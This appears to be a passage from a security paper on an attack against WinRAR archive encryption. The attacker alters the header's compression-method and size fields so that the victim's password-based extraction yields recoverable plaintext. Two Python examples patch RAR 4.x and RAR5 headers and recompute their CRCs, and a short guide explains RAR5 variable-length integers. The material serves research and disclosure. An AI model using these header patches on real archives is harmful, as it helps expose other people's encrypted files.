This attack requires modification of the archive's file header, which can be done with a hex editor. For the purposes of this paper, the author used the HxD hex editor to test the attack [31]. It is a free hex editor that provides several useful features, such as built-in calculation of CRC32.
When carrying out this attack, the original authors noted a problem in Step 3, when Bob attempts to decompress the modified file. WinRAR reports that the CRC check failed and automatically deletes the extracted file. The error is expected: the CRC recorded in the header was computed over the original uncompressed data, whereas extraction with the method set to "store" writes out the still-compressed bytes, so the two never match. The authors suggest using an unerase utility such as Norton's Unerase Utility to recover the deleted file. However, the deletion can be prevented with a built-in WinRAR feature. When specifying the path to extract the archive into, the user simply checks the "Keep broken files" option under Miscellaneous. The user still receives an error, but the extracted file is saved where indicated. An internet search shows that CRC checksum errors are common when extracting archives and that this is a frequently used workaround.
There are two important notes involving the modification of the compression method. First, the method may be changed to any of six possible values (0x30 through 0x35). However, changing the method without also altering the packed and total (unpacked) file sizes results in some loss of file contents, and the compression ratio of the various methods is difficult to predict accurately. To sidestep this, the compression method is set to 0x30, which indicates no compression, and the total file size is set equal to the packed file size, which requires no extra calculation on the attacker's part.
Secondly, the choice of no compression is what preserves the contents of the original file. In Step 2, Bob must enter his secret password for WinRAR to proceed with decryption and decompression of the file. WinRAR decrypts the contents of the archive before attempting decompression. Recall that Eve has modified the file header within the archive to indicate that the file is stored without compression, so WinRAR writes out the decrypted bytes exactly as they sit in the archive. The file obtained in this step is therefore the original Secret.txt as compressed with compression method 1. Because it is still compressed, the file appears incomprehensible to Bob, who was expecting a decompressed file. This Corrupted-Secret.txt is all that Eve needs to reconstruct Secret.txt.
Eve's choice of compression method in Step 4 is significant to the success of the attack. Adding Corrupted-Secret.txt to a WinRAR archive with no compression ensures that the archive contains an exact copy of the original file as compressed under method 1. If another method is applied, the archive holds two layers of compression on the file, and subsequent decompression yields Corrupted-Secret.txt rather than the desired Secret.txt. Eve then obtains the original text by changing the compression method field in the header to method 1. When the archive is unpacked, WinRAR uses compression method 1, which matches the compression already applied to Corrupted-Secret.txt, and the file is recovered. As in Step 3, the CRC recorded in this archive belongs to Corrupted-Secret.txt rather than to the recovered Secret.txt, so the "Keep broken files" option is needed here as well.
This attack was tested using WinRAR v3.42 and v5.10 for verification. The RAR (4.x) format was tested on both versions, while the newer RAR5 format was tested only on v5.10. Because the file formats differ, the modification of the file header differs slightly between versions. Identification of the header fields for RAR file types is outlined in Appendix B; the RAR5 format is discussed in the following section.
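The RAR (4.x) header edit described above, Step 1 (method to 0x30 and total size set equal to packed size) and Step 5 (method back to 0x31), as an added Python example that is not the paper's code. Appendix B is not reproduced here, so the field offsets are taken from the RAR 4.x technote file header (HEAD_CRC, HEAD_TYPE 0x74, HEAD_FLAGS, HEAD_SIZE, PACK_SIZE, UNP_SIZE, HOST_OS, FILE_CRC, FTIME, UNP_VER, METHOD, NAME_SIZE, ATTR, then HIGH_PACK_SIZE and HIGH_UNP_SIZE when flag 0x0100 is set, then the file name); the sample header is constructed for the test, and the function names are this example's own:

```python
"""Patch METHOD and UNP_SIZE in a RAR 4.x file header and re-seal HEAD_CRC.
Added example (not from the paper); offsets per the RAR 4.x technote."""
import struct
import zlib
from typing import Dict, Optional

HEAD_TYPE_FILE = 0x74
LHD_LARGE = 0x0100       # HEAD_FLAGS bit: 64-bit HIGH_PACK_SIZE/HIGH_UNP_SIZE present
METHOD_STORE = 0x30      # no compression; 0x31 (fastest) .. 0x35 (best)

# Byte offsets inside a file header block that starts at HEAD_CRC.
OFF_HEAD_CRC, OFF_HEAD_TYPE, OFF_HEAD_FLAGS, OFF_HEAD_SIZE = 0, 2, 3, 5
OFF_PACK_SIZE, OFF_UNP_SIZE, OFF_METHOD = 7, 11, 25
OFF_HIGH_PACK, OFF_HIGH_UNP = 32, 36


def rar4_head_crc(header: bytes) -> int:
    """HEAD_CRC is the low 16 bits of CRC32 over everything after the CRC field."""
    return zlib.crc32(header[2:]) & 0xFFFF


def rar4_fields(header: bytes) -> Dict[str, int]:
    """Parse the fields the attack cares about and check HEAD_CRC."""
    if len(header) < 32 or header[OFF_HEAD_TYPE] != HEAD_TYPE_FILE:
        raise ValueError("not a RAR 4.x file header (HEAD_TYPE 0x74)")
    if struct.unpack_from("<H", header, OFF_HEAD_SIZE)[0] != len(header):
        raise ValueError("HEAD_SIZE does not match block length")
    flags = struct.unpack_from("<H", header, OFF_HEAD_FLAGS)[0]
    pack = struct.unpack_from("<I", header, OFF_PACK_SIZE)[0]
    unp = struct.unpack_from("<I", header, OFF_UNP_SIZE)[0]
    if flags & LHD_LARGE:
        pack |= struct.unpack_from("<I", header, OFF_HIGH_PACK)[0] << 32
        unp |= struct.unpack_from("<I", header, OFF_HIGH_UNP)[0] << 32
    stored = struct.unpack_from("<H", header, OFF_HEAD_CRC)[0]
    return {"flags": flags, "pack_size": pack, "unp_size": unp,
            "method": header[OFF_METHOD],
            "head_crc_ok": int(stored == rar4_head_crc(header))}


def rar4_patch(header: bytes, method: int, unp_size: Optional[int] = None) -> bytes:
    """Return a copy with METHOD set, UNP_SIZE overwritten when given, and
    HEAD_CRC recomputed.  Step 1 of the attack is
    rar4_patch(h, METHOD_STORE, unp_size=rar4_fields(h)["pack_size"])."""
    if not 0x30 <= method <= 0x35:
        raise ValueError("METHOD must be 0x30..0x35")
    f = rar4_fields(header)
    hdr = bytearray(header)
    hdr[OFF_METHOD] = method
    if unp_size is not None:
        struct.pack_into("<I", hdr, OFF_UNP_SIZE, unp_size & 0xFFFFFFFF)
        if f["flags"] & LHD_LARGE:
            struct.pack_into("<I", hdr, OFF_HIGH_UNP, unp_size >> 32)
        elif unp_size >> 32:
            raise ValueError("size >= 4 GiB needs the LHD_LARGE flag")
    struct.pack_into("<H", hdr, OFF_HEAD_CRC, rar4_head_crc(hdr))  # re-seal
    return bytes(hdr)


def build_rar4_file_header(name: bytes, pack_size: int, unp_size: int,
                           method: int) -> bytes:
    """Constructed minimal header for testing (no SALT/EXT_TIME, HOST_OS=2,
    UNP_VER=29, FILE_CRC/FTIME zeroed); not taken from a real archive."""
    head_size = 32 + len(name)
    body = struct.pack("<BHHIIBIIBBHI", HEAD_TYPE_FILE, 0x8000, head_size,
                       pack_size, unp_size, 2, 0, 0, 29, method,
                       len(name), 0x20) + name
    return struct.pack("<H", zlib.crc32(body) & 0xFFFF) + body


if __name__ == "__main__":
    h = build_rar4_file_header(b"Secret.txt", 1000, 5000, 0x31)
    step1 = rar4_patch(h, METHOD_STORE, unp_size=rar4_fields(h)["pack_size"])
    print(rar4_fields(step1))
```

Whatever the hex editor shows, the two checks worth keeping are the ones rar4_fields makes: HEAD_SIZE must equal the block length you are editing, and HEAD_CRC must be recomputed over everything after the CRC field once METHOD or UNP_SIZE has changed, otherwise WinRAR rejects the header before it ever reaches the data CRC.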
3.3.1 RAR5 file header
New to the RAR5 format is the use of variable-length integers (vints) for the fields of the header; previous versions of WinRAR use fixed-width unsigned integers. Variable-length quantities allow larger values to be stored, and they add slightly more work for an adversary modifying the file header. However, this should not be relied on to increase the security of the archive.
In a vint, the lowest 7 bits of each byte contain integer data while the highest bit is a continuation flag: 1 indicates that further bytes follow in the sequence, 0 marks the final byte. RAR5 uses at most 10 bytes to represent an integer [32].
To convert a decimal value to a variable-length quantity, the following steps must be done:
1. Represent the decimal value in binary notation.
2. Beginning with the least significant bit, divide the binary number into groups of 7 bits. If the last (most significant) group has fewer than 7 bits, pad it with leading zeros.
3. Write the groups out one byte each, least significant group first: prefix every group except the most significant one with a 1 (more bytes follow) and prefix the most significant group with a 0 to mark the end of the integer. Because the low-order group is written first, the bytes appear in the file in little-endian order, as the technote specifies [32]. For example, 5000 (binary 1001110001000) splits into 0001000 and 0100111 and is stored as the bytes 88 27.
Fig. 3.1. A RAR5 archive with packed size and compression information highlighted
It is most convenient to modify the total file size field first. The total (unpacked) and packed file sizes can be read from the "Info" option in WinRAR. Convert the packed size to a variable-length quantity as outlined above and write it over the total file size field. If the new vint occupies a different number of bytes from the old one, the header size field and the header CRC32 at the start of the block must be updated as well.
Next, locate the two bytes containing the compression information; according to the WinRAR technote [32], this field immediately precedes the Host OS field. Decode the bytes as a vint and write the value in binary. Bits 8-10 (mask 0x0380 in the technote's numbering) define the compression method: in decimal, 0 indicates no compression while 5 is best compression. Modify the bits as necessary, re-encode the value as a vint, replace the original bytes, and recompute the header CRC32.
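The RAR5 procedure of Section 3.3.1, the vint conversion steps, the total-size rewrite and the compression-method edit, as an added Python example that is not the paper's code. It follows the RAR5 technote [32] layout (4-byte header CRC32, then the header size vint counting from the Header type field to the end of the block) and the compression-information bit layout from the same technote (version in the low 6 bits, solid flag, method, dictionary size); the sample file header block is constructed for the test and omits the optional mtime and data CRC fields, and all function names are this example's own:

```python
"""RAR5 vints and the compression-information field, with header re-sealing.
Added example (not from the paper); layout per the RAR5 technote."""
import zlib
from typing import Dict, Tuple

VINT_MAX_BYTES = 10
METHOD_MASK, METHOD_SHIFT = 0x0380, 7   # technote "bits 8-10" (1-based)


def vint_encode(value: int) -> bytes:
    """Low 7 bits first; high bit set on every byte except the last."""
    if value < 0:
        raise ValueError("vints are unsigned")
    out = bytearray()
    while True:
        chunk, value = value & 0x7F, value >> 7
        if value:
            out.append(chunk | 0x80)        # continuation flag: more follows
        else:
            out.append(chunk)               # flag 0: final (most significant) byte
            return bytes(out)


def vint_decode(buf: bytes, pos: int = 0) -> Tuple[int, int]:
    """Return (value, offset just past the vint)."""
    value, shift = 0, 0
    for i in range(VINT_MAX_BYTES):
        if pos + i >= len(buf):
            raise ValueError("truncated vint")
        b = buf[pos + i]
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos + i + 1
        shift += 7
    raise ValueError("vint longer than 10 bytes")


def comp_info_fields(ci: int) -> Dict[str, int]:
    """Split a decoded compression-information value into its fields."""
    return {"version": ci & 0x3F, "solid": (ci >> 6) & 1,
            "method": (ci & METHOD_MASK) >> METHOD_SHIFT,
            "dict_kb": 128 << ((ci >> 10) & 0xF)}


def set_method(ci: int, method: int) -> int:
    if not 0 <= method <= 5:
        raise ValueError("method is 0 (store) .. 5 (best)")
    return (ci & ~METHOD_MASK) | (method << METHOD_SHIFT)


def rar5_header_crc(block: bytes) -> int:
    """CRC32 over everything after the 4-byte CRC field."""
    return zlib.crc32(block[4:]) & 0xFFFFFFFF


def rar5_header_ok(block: bytes) -> bool:
    size, body_start = vint_decode(block, 4)
    return (len(block) == body_start + size and
            int.from_bytes(block[:4], "little") == rar5_header_crc(block))


def rar5_replace_vint(block: bytes, offset: int, value: int) -> bytes:
    """Overwrite the vint at `offset` of a complete header block (starting
    at its CRC32).  A longer or shorter vint changes the header size, so the
    size field is rebuilt and the CRC32 recomputed."""
    size, body_start = vint_decode(block, 4)
    if len(block) != body_start + size or offset < body_start:
        raise ValueError("bad block length or offset")
    _, end = vint_decode(block, offset)
    body = block[body_start:offset] + vint_encode(value) + block[end:]
    out = bytearray(4) + vint_encode(len(body)) + body
    out[0:4] = rar5_header_crc(out).to_bytes(4, "little")
    return bytes(out)


def rar5_set_method(block: bytes, ci_offset: int, method: int) -> bytes:
    ci, _ = vint_decode(block, ci_offset)
    return rar5_replace_vint(block, ci_offset, set_method(ci, method))


def build_file_header(packed: int, unpacked: int, comp_info: int,
                      name: bytes) -> Tuple[bytes, int, int]:
    """Constructed file-header block for testing.  Returns the block and the
    offsets of the Unpacked size and Compression information vints."""
    fields = [vint_encode(2), vint_encode(0x0002),      # type=file, data follows
              vint_encode(packed), vint_encode(0)]       # data size, file flags
    unp_off = sum(map(len, fields))
    fields += [vint_encode(unpacked), vint_encode(0x20)]  # unpacked size, attrs
    ci_off = sum(map(len, fields))
    fields += [vint_encode(comp_info), vint_encode(2),    # comp info, host OS
               vint_encode(len(name)), name]
    body = b"".join(fields)
    hs = vint_encode(len(body))
    block = bytearray(4) + hs + body
    block[0:4] = rar5_header_crc(block).to_bytes(4, "little")
    return bytes(block), 4 + len(hs) + unp_off, 4 + len(hs) + ci_off
```

The two-byte value 80 2B seen in a typical header decodes to 0x1580, i.e. method 3 with a 4 MB dictionary; Step 1 turns it into 0x1400 (80 28) by clearing the method bits, and rar5_replace_vint keeps the block consistent even when the new size vint is one byte shorter than the old one.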